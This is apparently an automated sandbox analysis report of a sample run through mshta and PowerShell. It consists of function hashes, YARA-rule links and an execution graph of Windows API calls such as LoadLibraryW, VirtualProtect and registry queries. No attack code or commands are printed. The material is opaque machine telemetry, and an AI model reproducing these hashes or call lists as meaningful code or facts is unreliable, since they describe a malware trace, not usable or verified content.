                                                                        • Opcode ID: 5ac63bb44311bd0a2a33b5cd8edb36f06b1461d89ec825ca026a1360d7f40c45
                                                                        • Instruction ID: 9fca655c72eb86068da514211fbde6beb9ce61faa0aac24691849c8dee499975
                                                                        • Opcode Fuzzy Hash: 5ac63bb44311bd0a2a33b5cd8edb36f06b1461d89ec825ca026a1360d7f40c45
                                                                        • Instruction Fuzzy Hash: 0211C4B160DB880FF79EA57A583C3652ED1E7F6344FC644AB9546CB2E3E8048CC98352
                                                                        Function 00000204549D0F81 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669599950.00000204549D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000204549D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_204549d0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction ID: ad2af3b5081058636cfd79dd9a4994750a53bb543540173d301bf160a44296af
                                                                        • Opcode Fuzzy Hash: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction Fuzzy Hash: A99002844D550667D41821A50C4A25D5440A3D8158FE4C4804516A4145D44D02961162
                                                                        Function 00000204549D0F79 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669599950.00000204549D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000204549D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_204549d0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction ID: ad2af3b5081058636cfd79dd9a4994750a53bb543540173d301bf160a44296af
                                                                        • Opcode Fuzzy Hash: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction Fuzzy Hash: A99002844D550667D41821A50C4A25D5440A3D8158FE4C4804516A4145D44D02961162
                                                                        Function 00000204549D0F99 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669599950.00000204549D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000204549D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_204549d0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction ID: ad2af3b5081058636cfd79dd9a4994750a53bb543540173d301bf160a44296af
                                                                        • Opcode Fuzzy Hash: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction Fuzzy Hash: A99002844D550667D41821A50C4A25D5440A3D8158FE4C4804516A4145D44D02961162
                                                                        Function 00000204549D0F89 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669599950.00000204549D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000204549D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_204549d0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction ID: ad2af3b5081058636cfd79dd9a4994750a53bb543540173d301bf160a44296af
                                                                        • Opcode Fuzzy Hash: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction Fuzzy Hash: A99002844D550667D41821A50C4A25D5440A3D8158FE4C4804516A4145D44D02961162
                                                                        Function 00000204549D0FC1 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669599950.00000204549D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000204549D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_204549d0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction ID: ad2af3b5081058636cfd79dd9a4994750a53bb543540173d301bf160a44296af
                                                                        • Opcode Fuzzy Hash: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction Fuzzy Hash: A99002844D550667D41821A50C4A25D5440A3D8158FE4C4804516A4145D44D02961162
                                                                        Function 00000204549D0FA9 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000003.1669599950.00000204549D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000204549D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_3_204549d0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction ID: ad2af3b5081058636cfd79dd9a4994750a53bb543540173d301bf160a44296af
                                                                        • Opcode Fuzzy Hash: 0e5b259a4ef372df3a19dbea43aa51bdba87727b4cd2006260a3058bb59ed270
                                                                        • Instruction Fuzzy Hash: A99002844D550667D41821A50C4A25D5440A3D8158FE4C4804516A4145D44D02961162

                                                                        Executed Functions

                                                                        Function 00007FFAAB4C3C06 Relevance: 3.4, Strings: 2, Instructions: 929COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1662467720.00007FFAAB4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab4c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: r6/$r6/
                                                                        • API String ID: 0-3679798658
                                                                        • Opcode ID: 81d234351f2268a82483daf3494009e4b17bb54616eeac791b1b949d64c544b8
                                                                        • Instruction ID: f441e04ce813fa6533dcc74abd917f7fe4588032b2702c1b0f5318d7e6ea27e4
                                                                        • Opcode Fuzzy Hash: 81d234351f2268a82483daf3494009e4b17bb54616eeac791b1b949d64c544b8
                                                                        • Instruction Fuzzy Hash: EB52496290EBC64FE397976848565B57FE1EF53690B0841FBD08DC71E3DD189C0A8392
                                                                        Function 00007FFAAB4C40F7 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1662467720.00007FFAAB4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab4c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: r6/$r6/
                                                                        • API String ID: 0-3679798658
                                                                        • Opcode ID: 8e7cbec99f34de379cc50c9838bc89b2c14d9e35d14fc2786941cea0bcca34d9
                                                                        • Instruction ID: 7401bf95aed51c066df54b11ac8e8311bf765163dd710065342c4d0487e0f139
                                                                        • Opcode Fuzzy Hash: 8e7cbec99f34de379cc50c9838bc89b2c14d9e35d14fc2786941cea0bcca34d9
                                                                        • Instruction Fuzzy Hash: 62113A23E1EA0A8BF2A9971C675B1BC22C1EFA7BE0F49527AD48DC35E6DD0C6C0501C1
                                                                        Function 00007FFAAB4C3D5A Relevance: .1, Instructions: 148COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1662467720.00007FFAAB4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab4c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30bd91d8096edaaee06eb6f2712a827e2142c41084c86fca5c90014889b41703
                                                                        • Instruction ID: 5f8412687e142a8a359f66242a71dbde260271bc6e35622496645544b9a193c2
                                                                        • Opcode Fuzzy Hash: 30bd91d8096edaaee06eb6f2712a827e2142c41084c86fca5c90014889b41703
                                                                        • Instruction Fuzzy Hash: E241E653E0FA879BE3A7976804652755AC2FF97A90F4844B9D44DC31F3DE299C0843C1
                                                                        Function 00007FFAAB3F3A05 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1661231734.00007FFAAB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab3f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d3e6dd54b63d5d632126e35a7a08626c015f8165c9f7962c45238f9e3ec1f562
                                                                        • Instruction ID: eb2b5ec5f2523d1d36bcf909b24883daeb6ec04444217999827b4a2f8784759a
                                                                        • Opcode Fuzzy Hash: d3e6dd54b63d5d632126e35a7a08626c015f8165c9f7962c45238f9e3ec1f562
                                                                        • Instruction Fuzzy Hash: 7901677111CB0C8FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E881CB45
                                                                        Function 00007FFAAB4C04D8 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1662467720.00007FFAAB4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab4c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f65ec55ee38be22f498acb029d016285e7b1f1322fc3243cbdbc55e4b022dce
                                                                        • Instruction ID: 519dd4651e50f9c4e4ee598d50dfe70b239f90ba3d865bd3a556491caf4bd17e
                                                                        • Opcode Fuzzy Hash: 9f65ec55ee38be22f498acb029d016285e7b1f1322fc3243cbdbc55e4b022dce
                                                                        • Instruction Fuzzy Hash: C2E0D833E0E9294FA7A6EB9C68595F86A85DF56B6570441B7E90CD3291DC049C1443C1

                                                                        Non-executed Functions

                                                                        Function 00007FFAAB3F07E5 Relevance: 6.3, Strings: 5, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.1661231734.00007FFAAB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_7ffaab3f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (0L$8,L$H1L$P/L$p0L
                                                                        • API String ID: 0-795106677
                                                                        • Opcode ID: 709b4689b8bc808d1bce72c8828b62ac58278835c0d559ab4c8fb9232388d475
                                                                        • Instruction ID: 55a9379387de0d639bbbf127f49811a0cf8af7bd6cdd28ef45107fb8682b6db9
                                                                        • Opcode Fuzzy Hash: 709b4689b8bc808d1bce72c8828b62ac58278835c0d559ab4c8fb9232388d475
                                                                        • Instruction Fuzzy Hash: 05316F8690FFC15FE3568BB818652656F90EF63294B1C80FFD0C84A9EB9984AD0D83D1

                                                                        Execution Graph

                                                                        Execution Coverage:16.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:7.1%
                                                                        Total number of Nodes:536
                                                                        Total number of Limit Nodes:13
                                                                        execution_graph 2426 3549234 WSAStartup GetLastError 3006 320c800 LoadLibraryW LoadLibraryW LoadLibraryW 2953 3069704 2954 3069715 2953->2954 2956 3069776 2953->2956 2955 306971e UnhandledExceptionFilter 2954->2955 2957 3069664 2954->2957 2955->2956 2955->2957 2957->2956 2960 3066fe0 2957->2960 2961 3069cbc 11 API calls 2960->2961 2962 3066feb 2961->2962 2705 320ebe4 2710 307007c 2705->2710 2707 320ec04 2715 3069558 2707->2715 2711 3070084 2710->2711 2711->2711 2714 30700d1 2711->2714 2721 306d28c 2711->2721 2713 30700c0 LoadStringW 2713->2714 2714->2707 2716 3069566 2715->2716 2717 306955c 2715->2717 2720 30695a4 2716->2720 2858 3066fd4 2716->2858 2718 3069cc8 11 API calls 2717->2718 2718->2716 2722 306d2b9 2721->2722 2723 306d29a 2721->2723 2722->2713 2723->2722 2726 306d244 2723->2726 2727 306d254 GetModuleFileNameW 2726->2727 2728 306d270 2726->2728 2730 306e4b8 GetModuleFileNameW 2727->2730 2728->2713 2731 306e506 2730->2731 2736 306e394 2731->2736 2733 306e532 2734 306e544 LoadLibraryExW 2733->2734 2735 306e54c 2733->2735 2734->2735 2735->2728 2739 306e3b5 2736->2739 2737 306e43d 2737->2733 2739->2737 2754 306e0d0 2739->2754 2740 306e42a 2741 306e430 2740->2741 2742 306e43f GetUserDefaultUILanguage 2740->2742 2743 306e1fc 2 API calls 2741->2743 2758 306da80 EnterCriticalSection 2742->2758 2743->2737 2745 306e44c 2778 306e1fc 2745->2778 2747 306e459 2748 306e467 GetSystemDefaultUILanguage 2747->2748 2749 306e481 2747->2749 2750 306da80 17 API calls 2748->2750 2749->2737 2782 306e2c8 2749->2782 2752 306e474 2750->2752 2753 306e1fc 2 API calls 2752->2753 2753->2749 2755 306e0f2 2754->2755 2757 306e0fc 2754->2757 2790 306ddb4 2755->2790 2757->2740 2759 306dacc LeaveCriticalSection 2758->2759 2760 306daac 2758->2760 2827 3069e98 2759->2827 2762 306dabd LeaveCriticalSection 2760->2762 2764 306db6e 2762->2764 2763 306dadd IsValidLocale 2765 306daec 2763->2765 2766 306db3b EnterCriticalSection 2763->2766 2764->2745 2768 306daf5 2765->2768 2769 306db00 2765->2769 2767 306db53 2766->2767 2774 306db64 LeaveCriticalSection 2767->2774 2829 306d964 GetThreadUILanguage 2768->2829 2842 306d768 2769->2842 2772 306dafe 2772->2766 2773 306db09 GetSystemDefaultUILanguage 2773->2766 2775 306db13 2773->2775 2774->2764 2776 306db24 GetSystemDefaultUILanguage 2775->2776 2777 306d768 3 API calls 2776->2777 2777->2772 2780 306e21a 2778->2780 2779 306e295 2779->2747 2780->2779 2851 306e190 2780->2851 2856 3069f7c 2782->2856 2785 306e318 2786 306e190 2 API calls 2785->2786 2787 306e32c 2786->2787 2788 306e35a 2787->2788 2789 306e190 2 API calls 2787->2789 2788->2737 2789->2788 2791 306ddcb 2790->2791 2792 306dddf GetModuleFileNameW 2791->2792 2793 306ddf4 2791->2793 2792->2793 2794 306dfc3 2793->2794 2795 306de1c RegOpenKeyExW 2793->2795 2794->2757 2796 306de43 RegOpenKeyExW 2795->2796 2797 306dedd 2795->2797 2796->2797 2798 306de61 RegOpenKeyExW 2796->2798 2811 306dbc4 GetModuleHandleW 2797->2811 2798->2797 2800 306de7f RegOpenKeyExW 2798->2800 2800->2797 2802 306de9d RegOpenKeyExW 2800->2802 2801 306defb RegQueryValueExW 2803 306df4c RegQueryValueExW 2801->2803 2804 306df19 2801->2804 2802->2797 2807 306debb RegOpenKeyExW 2802->2807 2805 306df4a 2803->2805 2806 306df68 2803->2806 2809 306df21 RegQueryValueExW 2804->2809 2808 306dfb2 RegCloseKey 2805->2808 2810 306df70 RegQueryValueExW 2806->2810 2807->2794 2807->2797 2808->2757 2809->2805 2810->2805 2812 306dbec GetProcAddress 2811->2812 2813 306dbfd 2811->2813 2812->2813 2814 306dc13 2813->2814 2819 306dc5f 2813->2819 2823 306dba0 2813->2823 2814->2801 2817 306dba0 CharNextW 2817->2819 2818 306dba0 CharNextW 2818->2819 2819->2814 2819->2818 2820 306dce4 FindFirstFileW 2819->2820 2822 306dd4e lstrlenW 2819->2822 2820->2814 2821 306dd00 FindClose lstrlenW 2820->2821 2821->2814 2821->2819 2822->2819 2824 306dbae 2823->2824 2825 306dbbc 2824->2825 2826 306dba6 CharNextW 2824->2826 2825->2814 2825->2817 2826->2824 2828 3069e9e 2827->2828 2828->2763 2830 306d980 2829->2830 2831 306d9d9 2829->2831 2847 306d920 GetThreadPreferredUILanguages 2830->2847 2832 306d920 2 API calls 2831->2832 2838 306d9e1 2832->2838 2836 306da28 SetThreadPreferredUILanguages 2837 306d920 2 API calls 2836->2837 2839 306da3e 2837->2839 2838->2836 2841 306da69 2838->2841 2840 306da59 SetThreadPreferredUILanguages 2839->2840 2839->2841 2840->2841 2841->2772 2843 306d7a3 2842->2843 2844 306d80c IsValidLocale 2843->2844 2846 306d85a 2843->2846 2845 306d81f GetLocaleInfoW GetLocaleInfoW 2844->2845 2844->2846 2845->2846 2846->2773 2848 306d941 2847->2848 2849 306d95a SetThreadPreferredUILanguages 2847->2849 2850 306d94a GetThreadPreferredUILanguages 2848->2850 2849->2831 2850->2849 2852 306e1a5 2851->2852 2853 306e1c2 FindFirstFileW 2852->2853 2854 306e1d2 FindClose 2853->2854 2855 306e1d8 2853->2855 2854->2855 2855->2780 2857 3069f80 GetUserDefaultUILanguage GetLocaleInfoW 2856->2857 2857->2785 2859 30711f8 11 API calls 2858->2859 2860 3066fd9 2859->2860 2860->2720 2963 306974a 2964 3069776 2963->2964 2965 3069664 2963->2965 2965->2964 2966 3066fe0 11 API calls 2965->2966 2967 30696fe 2966->2967 3007 306f568 3010 306eea8 3007->3010 3009 306f57f 3011 306ee3c 13 API calls 3010->3011 3012 306eed8 3011->3012 3013 306ef35 3012->3013 3014 306ef4f 3012->3014 3017 306ef09 3012->3017 3015 306cd60 32 API calls 3013->3015 3016 306cd60 32 API calls 3014->3016 3018 306ef4a 3015->3018 3016->3018 3017->3009 3019 306ee54 2 API calls 3018->3019 3019->3017 3020 3066268 3021 30659d4 10 API calls 3020->3021 3022 3066274 3021->3022 2427 355d444 2430 3071764 GetModuleHandleW 2427->2430 2429 355d454 2431 307179f 2430->2431 2431->2429 2968 306f617 2969 306f634 2968->2969 2970 306f61d 2968->2970 2970->2969 2972 306ef98 2970->2972 2978 306ee3c 2972->2978 2977 306effc 2977->2969 2979 306ee45 2978->2979 2980 306ee50 2978->2980 2981 3068a30 13 API calls 2979->2981 2980->2977 2982 306ee54 2980->2982 2981->2980 2983 306ee65 2982->2983 2984 306ee5d 2982->2984 2983->2969 2985 3068bc8 2 API calls 2984->2985 2985->2983 2432 3525340 LoadLibraryA GetProcAddress 2437 306cd60 2432->2437 2434 3525393 2440 35251e8 2434->2440 2443 306cab8 2437->2443 2439 306cd6a 2439->2434 2671 3525180 2440->2671 2445 306caf6 2443->2445 2448 306cadb 2443->2448 2444 306cb64 2453 306cbcb 2444->2453 2454 306ca74 2444->2454 2445->2444 2447 306cc31 2445->2447 2447->2453 2471 306c100 2447->2471 2448->2439 2449 306cab8 32 API calls 2449->2453 2451 306cb7c 2451->2453 2464 306bfd8 2451->2464 2453->2448 2453->2449 2475 30711f8 2454->2475 2456 306ca7d 2457 306ca85 2456->2457 2458 306ca93 2456->2458 2459 30711f8 11 API calls 2457->2459 2461 30711f8 11 API calls 2458->2461 2460 306ca8a 2459->2460 2460->2451 2462 306caa1 2461->2462 2463 30711f8 11 API calls 2462->2463 2463->2460 2465 306bff4 2464->2465 2467 306c038 2464->2467 2466 306c0a1 2465->2466 2465->2467 2468 306c072 2465->2468 2466->2467 2518 306bcfc 2466->2518 2467->2453 2468->2467 2470 306bfd8 32 API calls 2468->2470 2470->2468 2472 306c111 2471->2472 2473 306c109 2471->2473 2472->2453 2647 306bec0 2473->2647 2476 3071207 2475->2476 2477 307122d TlsGetValue 2475->2477 2476->2456 2478 3071237 2477->2478 2479 3071212 2477->2479 2478->2456 2483 30711b4 2479->2483 2482 3071226 2482->2456 2486 30711ba 2483->2486 2484 30711e8 TlsGetValue 2484->2482 2485 30711d3 2496 30711a0 LocalAlloc 2485->2496 2486->2484 2486->2485 2493 3069cc8 2486->2493 2489 30711da 2490 30711de 2489->2490 2491 30711ea TlsSetValue 2489->2491 2492 3069cc8 10 API calls 2490->2492 2491->2484 2492->2484 2497 3069cbc 2493->2497 2496->2489 2500 3069b8c 2497->2500 2501 3069ba8 2500->2501 2502 3069bb2 2500->2502 2510 3069af4 2501->2510 2503 3069bc2 GetCurrentThreadId 2502->2503 2505 3069bcf 2502->2505 2503->2505 2506 3066fa0 8 API calls 2505->2506 2507 3069c5f FreeLibrary 2505->2507 2508 3069c87 ExitProcess 2505->2508 2506->2505 2507->2505 2511 3069afe GetStdHandle WriteFile 2510->2511 2512 3069b5b 2510->2512 2516 306a91c 2511->2516 2512->2502 2515 3069b4b GetStdHandle WriteFile 2515->2502 2517 306a922 2516->2517 2517->2515 2519 306be9b 2518->2519 2522 306bd1f 2518->2522 2519->2466 2520 306bfd8 32 API calls 2520->2522 2521 306bcfc 32 API calls 2521->2522 2522->2519 2522->2520 2522->2521 2525 306f908 2522->2525 2531 306f8dc 2522->2531 2526 306f91a 2525->2526 2527 306f8dc 14 API calls 2526->2527 2528 306f92f 2527->2528 2535 306f870 2528->2535 2530 306f946 2530->2522 2532 306f8e7 2531->2532 2533 306f901 2531->2533 2636 306f8a8 2532->2636 2533->2522 2536 306f8a3 2535->2536 2537 306f87b 2535->2537 2536->2530 2539 306f4b0 2537->2539 2540 306f4d4 2539->2540 2541 306f4cc 2539->2541 2562 306f1f0 2540->2562 2551 306f34c 2541->2551 2544 306f4fc 2550 306f53f 2544->2550 2566 306f2b8 2544->2566 2577 306f258 2550->2577 2552 306f365 2551->2552 2553 306f401 2551->2553 2554 306f376 2552->2554 2581 30688d4 2552->2581 2553->2540 2585 3068a30 2554->2585 2557 306f3d4 2603 3068bc8 2557->2603 2561 306f3a5 2561->2557 2600 306f1dc 2561->2600 2563 306f203 2562->2563 2564 306f1f9 2562->2564 2563->2544 2565 3068a30 13 API calls 2564->2565 2565->2563 2567 306f2c0 2566->2567 2568 306f2c9 2567->2568 2632 306ed88 2567->2632 2570 306f06c 2568->2570 2571 306f086 2570->2571 2572 306f08f 2571->2572 2573 306f0a9 2571->2573 2574 306cd60 32 API calls 2572->2574 2575 306cd60 32 API calls 2573->2575 2576 306f0a4 2573->2576 2574->2576 2575->2576 2576->2550 2578 306f261 2577->2578 2579 306f268 2577->2579 2580 3068bc8 2 API calls 2578->2580 2579->2536 2580->2579 2582 30688dd 2581->2582 2584 30688e2 2581->2584 2608 30687a8 GetModuleHandleW GetProcAddress 2582->2608 2584->2554 2587 3068a3e 2585->2587 2588 3068a67 GetTickCount 2587->2588 2589 3068ad9 GetTickCount 2587->2589 2590 3068b10 GetTickCount 2587->2590 2591 3068a7f GetTickCount 2587->2591 2592 3068a8c 2587->2592 2594 3068aae GetCurrentThreadId 2587->2594 2614 3068ebc GetCurrentThreadId 2587->2614 2619 30686ec 2587->2619 2588->2587 2589->2587 2589->2592 2626 3068c28 2590->2626 2591->2587 2591->2592 2592->2561 2594->2592 2596 3068b3a GetTickCount 2597 3068b20 2596->2597 2597->2590 2597->2596 2598 3068ba4 2597->2598 2598->2592 2599 3068baa GetCurrentThreadId 2598->2599 2599->2592 2601 30688d4 5 API calls 2600->2601 2602 306f1e4 2601->2602 2602->2561 2630 30688bc GetCurrentThreadId 2603->2630 2605 3068bd3 2606 3068c28 Sleep 2605->2606 2607 3068bff 2605->2607 2606->2607 2607->2540 2609 30687d0 GetLogicalProcessorInformation 2608->2609 2613 3068818 2608->2613 2610 30687df GetLastError 2609->2610 2609->2613 2611 30687e9 2610->2611 2610->2613 2612 30687f1 GetLogicalProcessorInformation 2611->2612 2612->2613 2613->2584 2615 3068ed0 2614->2615 2616 3068ec9 2614->2616 2617 3068ee4 GetCurrentThreadId 2615->2617 2618 3068ef7 2615->2618 2616->2587 2617->2618 2618->2587 2621 30686f7 2619->2621 2620 3068745 2620->2587 2621->2620 2622 3068726 2621->2622 2623 306871d Sleep 2621->2623 2624 3068735 Sleep 2622->2624 2625 306873e SwitchToThread 2622->2625 2623->2620 2624->2620 2625->2620 2627 3068c81 2626->2627 2628 3068c3a 2626->2628 2627->2597 2628->2627 2629 3068c68 Sleep 2628->2629 2629->2628 2631 30688c9 2630->2631 2631->2605 2633 306ed93 2632->2633 2634 30688d4 5 API calls 2633->2634 2635 306ed9a 2634->2635 2635->2568 2637 306f8ac 2636->2637 2638 306f8b9 2636->2638 2640 306f588 2637->2640 2638->2533 2641 306f634 2640->2641 2642 306f5a8 2640->2642 2641->2638 2643 306f1f0 13 API calls 2642->2643 2644 306f5d0 2643->2644 2645 306f258 2 API calls 2644->2645 2646 306f60f 2645->2646 2646->2638 2648 306bed5 2647->2648 2654 306bef2 2647->2654 2650 306beda 2648->2650 2651 306bf26 2648->2651 2652 306bf65 2650->2652 2653 306bee9 2650->2653 2650->2654 2651->2654 2657 306a2ec 2651->2657 2652->2654 2655 306bec0 32 API calls 2652->2655 2653->2654 2664 306bb54 2653->2664 2654->2472 2655->2652 2658 306a313 2657->2658 2659 306a2f0 2657->2659 2658->2651 2662 306a303 SysReAllocStringLen 2659->2662 2663 3069e78 2659->2663 2660 3069ee6 SysFreeString 2661 3069ef4 2660->2661 2661->2651 2662->2658 2662->2663 2663->2660 2663->2661 2665 306bce3 2664->2665 2668 306bb79 2664->2668 2665->2653 2666 306f908 32 API calls 2666->2668 2667 306a2ec 2 API calls 2667->2668 2668->2665 2668->2666 2668->2667 2669 306bec0 32 API calls 2668->2669 2670 306bb54 32 API calls 2668->2670 2669->2668 2670->2668 2676 320bf68 2671->2676 2673 35251a3 2674 320bf68 14 API calls 2673->2674 2675 35251d5 2673->2675 2674->2675 2677 320bf8e 2676->2677 2682 320c878 2677->2682 2679 320bfa0 2680 320bfa4 VirtualProtect 2679->2680 2681 320bfbd 2679->2681 2680->2681 2681->2673 2683 320c88f 2682->2683 2684 320ca24 2683->2684 2685 320c920 LoadLibraryW 2683->2685 2686 320c9c2 LoadLibraryW 2683->2686 2687 320c904 LoadLibraryW 2683->2687 2688 320c8e8 LoadLibraryW 2683->2688 2689 320c9a9 LoadLibraryW 2683->2689 2690 320ca0d LoadLibraryW 2683->2690 2691 320c990 LoadLibraryW 2683->2691 2692 320c974 LoadLibraryW 2683->2692 2693 320c9f4 LoadLibraryW 2683->2693 2694 320c958 LoadLibraryW 2683->2694 2695 320c9db LoadLibraryW 2683->2695 2696 320c93c LoadLibraryW 2683->2696 2697 320ca2c 2684->2697 2699 320ca4a 2684->2699 2685->2684 2686->2684 2687->2684 2688->2684 2689->2684 2690->2684 2691->2684 2692->2684 2693->2684 2694->2684 2695->2684 2696->2684 2701 320cb90 2697->2701 2699->2679 2700 320ca37 2700->2699 2702 320cbac 2701->2702 2703 320ccc8 2702->2703 2704 320cca3 LoadLibraryW 2702->2704 2703->2700 2704->2702 3023 3525920 3032 30678e8 3023->3032 3026 3525959 3028 3525968 GetVersionExW 3026->3028 3027 352597d 3029 35259aa LoadLibraryW 3027->3029 3031 35259cd 3027->3031 3028->3027 3034 3073758 3029->3034 3033 30678ef GetVersionExW 3032->3033 3033->3026 3033->3027 3035 3073780 GetProcAddress 3034->3035 3037 307378c 3034->3037 3036 30737d8 3035->3036 3036->3031 3038 30737b1 GetProcAddress 3037->3038 3039 30737d0 3038->3039 3039->3031 2861 3065f50 2862 3065f60 2861->2862 2863 3065fe8 2861->2863 2864 3065fa4 2862->2864 2865 3065f6d 2862->2865 2866 3065ff1 2863->2866 2867 3065888 2863->2867 2871 30659d4 10 API calls 2864->2871 2868 3065f78 2865->2868 2874 30659d4 10 API calls 2865->2874 2870 3066009 2866->2870 2882 3066118 2866->2882 2869 3066263 2867->2869 2872 30658ac VirtualQuery 2867->2872 2873 306598b 2867->2873 2878 306602c 2870->2878 2881 30660f0 2870->2881 2883 3066010 2870->2883 2875 3065fbb 2871->2875 2884 3065953 2872->2884 2889 30658e5 2872->2889 2880 30659d4 10 API calls 2873->2880 2897 306593e 2873->2897 2876 3065f85 2874->2876 2877 30659d4 10 API calls 2896 3066195 2877->2896 2878->2883 2888 306606c Sleep 2878->2888 2880->2897 2885 30659d4 10 API calls 2881->2885 2886 3066154 Sleep 2882->2886 2887 306617c 2882->2887 2882->2896 2898 30659d4 2884->2898 2895 30660f9 2885->2895 2886->2887 2891 306616e Sleep 2886->2891 2887->2877 2887->2896 2888->2883 2892 3066084 Sleep 2888->2892 2889->2884 2893 3065912 VirtualAlloc 2889->2893 2891->2882 2892->2878 2893->2884 2894 3065928 VirtualAlloc 2893->2894 2894->2884 2894->2897 2899 3065c34 2898->2899 2900 30659ec 2898->2900 2901 3065bf8 2899->2901 2902 3065d4c 2899->2902 2910 30659fe 2900->2910 2914 3065a89 Sleep 2900->2914 2908 3065c12 Sleep 2901->2908 2916 3065c52 2901->2916 2903 3065d55 2902->2903 2904 3065780 VirtualAlloc 